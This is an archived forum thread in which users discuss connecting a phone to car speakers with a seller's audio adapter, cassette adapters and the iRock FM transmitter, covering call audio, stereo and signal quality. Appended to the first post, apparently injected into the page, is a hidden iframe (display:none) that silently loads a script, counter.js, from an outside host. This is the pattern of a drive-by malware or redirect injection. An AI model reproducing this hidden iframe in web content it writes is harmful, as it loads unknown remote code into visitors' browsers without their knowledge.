Top Of Line Car Speaker System For 35 Dollars!!!

The subject says it all..

I bought one of CoolCat's adaptors and received it today. I can't stop raving about it. I use a sony tape adaptor and plug it into the adaptor and now I have 4 hrs of music at my disposal. Not to mention played over the car's stereo system, it sounds unbelievable. Its like having a 200 disc changer.

Here is the best part, when a caller phones in, I can talk to them via the mic and I can hear them over my car speakers. I have seen built in speakerphones from Ford, all the way up to BMW's and this set up easily rivals them. I was talking to someone else on this board under normal driving conditions, and also, driving on the HIGHWAY WITH MY WINDOWS DOWN!! They could hear me fine and I could hear them just as well. NO ECHO, like those dinky car kits that verizon sells for like 69 bucks (39 on ebay).

I know this sounds like a commercial, but I'm just so happy with the product that I truly want to reward Coolcat with more business. These adaptors are professional quality. Here is the link:

http://www.geocities.com/nokmout/adapter.html

Not only is the quality unbelievable, coolcat was excellent to deal with. super nice, very very professional, and just awesome in general.

you won't be disappointed. anybody else have similar experiences, go ahead and let us know.

Thanks coolcat!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

what needs to be done to set this up? are you saying using the 7135 you can bridge the sound of a caller into your cars speaker system along with all the mp3? that would interest me signifcantly but how do you attach it to your stereo system?

that is exactly what i'm saying!!!

here is my set up:

from the stereo, cassette bay, I have a tape to cd adaptor. at the end of the adaptor is a 3.5mm jack, which is too big for the 7135. i plug the 3.5mm jack into the 3.5mm end of coolcat's adaptor, and the other end of the adaptor which is 2.5mm is in my phone.

there is also a mic extension so people can hear me during the calls and for voice recognition.

ANY SOUND THAT THE PHONE MAKES, MP3S, FLIP, CLICKS, CALLS, PLAY THROUGH THE CAR'S SPEAKERS!!

does that help?

I'm doing the same thing use my adapter except I play it through an IRock, which plugs into the 3.5mm jack and then transmits on a FM freq (88.1, 88.3, 88.5 & 88.7). I've used mostly for listening to voice-mail (other than MP3 of course).

I agree with Badboy that it works very well.

This sounds great. Only problem is, I only have a CD player in my car, no tape deck. What could I do to take advantage of this?

The I-Rock is an FM-modulator which will transmit what you would normally hear through a headset to a frequency on your radio. (i.e. 88.1fm, 88.5fm or 88.7fm).

Here is a link to an I-Rock

Will this Iroc work for getting phone calls into your car speakers as well?

I would seriously love this.

How is the quality of the I-Rock?
I am guessing that by using the I-Rock in combination with the CoolCat, I can hear calls come in through my car's stereo. However, I imagine that I would not hear the phone ring if I am listening to another station.
Currently, I am using the Kyo car kit. The speak on it is great, but the microphone sucks (just a little nub of a microphone). I adapted my old Nokia microphone (that has a long cord), but the quality definitely dropped and everyone complains that they can't hear me.

The irock is kool and the gang... I use it with my ipod on my house receiver when Power 105 or Hot 97 feels like spinning bunk.

If you live in a horrorshow of a city such as ****** or whatever, the radio station signal might not be powerful so it might cut out.

This looks interesting, but to ask the question again from GalenMD, if you're listening to another station, does that mean you won't get incoming calls? Seems like that would make it useless, unless you don't want to listen to anything other than the mp3 player....

Coolcat Adapter

OK, I went to the link. Which adapter did you purchase? There are several available. How did you talk to an incoming call while listening to your MP3's? Does it suspend play while a call comes in? I just ordered the handsfree kit from Dan, but I am concerned about the volume issues everyone is talking about. Also, you probably have to have a car charger with these adapters as well right? Whereas the hands free kit charges at the same time.
Already purchasing things I may not need. UGH!
Thanks for your insight. I am trying to get this right on the first try.

And I hope you do... please let us know how it all turns out. I'm close to pulling the trigger on getting some of the same stuff, and I'm not yet sure what adapter I want/need to get, and I've not used a hands-free car kit before.

Here's another link with more detailed specs:
http://www.pcmall.com/pcmall/shop/de...sp?dpno=968067

It takes a stereo input and uses FM Stereo modulation, and there's also a spec called "stereo separation." I don't know exactly what the modulation and separation mean, but it sure looks like the tranmission is stereo. I think a lot of people would look for another solution if it weren't.

Just to help clarify things...

The iRock will transmit in stereo, but the phone part only works on the left side (I think thats what badboy told me)...so the music will play in stereo, but the calls will only be on one side....this works just like the stereo headset if you have that.

The iRock is an FM modulator...which in laymans terms means that its a tiny FM radio station. It broadcasts the sound over the radio... but only a few feet...so if you want to use the phone you have to tune your radio to that station. This means that no, you cant use it if you are listening to a different station.... HOWEVER...I think you can set the phone to ring through the regular speaker...so what you can do is have the phone radio station as a preset on your car stereo. When the phone rings (on its own) you can then switch to your preset station to use the phone. Coolcat has an adapter with a mic built in (with a smartbutton), so you can press the button to answer the call, or you can use the voice answer setup. The ONLY downside to this setup is that the ringer won't ring through your stereo if you are listening to another radio station.

How is the iRock sound quality??? Ive heard various things. Belkin also makes an FM modulator that Apple now directly endorses for the iPod (they used to endorse the iRock).

It's stereo. My experience with the i-Rock wasn't the greatest. In my case I was using it with an Archos Jukebox MP3 player. I really couldn't get that great of a signal to the car stereo. I do believe it depends on how much radio interference there is in your area. I would definitely purchase it from somewhere you could return it, just in case it doesn't work that well for you.

The real problem is that the FCC limits the strength that conumer FM modulators can have...they don't want Joe Public broadcasting a Billy Joel mix to everyone in a quartermile radius of their car. I heard european ones don't have that rescriction and are much better.
